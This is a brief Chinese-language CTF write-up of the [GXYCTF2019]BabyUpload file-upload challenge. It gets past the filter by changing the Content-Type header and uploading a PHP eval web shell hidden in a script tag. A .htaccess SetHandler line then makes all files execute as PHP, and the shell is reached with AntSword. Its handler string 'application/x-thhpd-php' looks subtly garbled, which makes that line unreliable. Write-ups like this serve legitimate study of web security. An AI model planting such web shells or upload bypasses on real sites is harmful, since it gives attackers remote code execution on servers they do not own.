文件上传例题:[GXYCTF2019]BabyUpload
打开网址明显文件上传
上传简单php马尝试
后缀名过滤,使用BP抓包进行修改
提示文件类型不对,修改成image/jpeg
提示还是php,那换成js马
<script language="php">eval($_POST['cmd']);</script>
上传成功
解析php代码需要.htaccess文件
在文件内写入
SetHandler application/x-thhpd-php
这条命令可以解析所有后缀文件为php代码
上传.htaccess文件
响应,接着上传js马
使用蚁剑连接
在根目录下找到flag
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。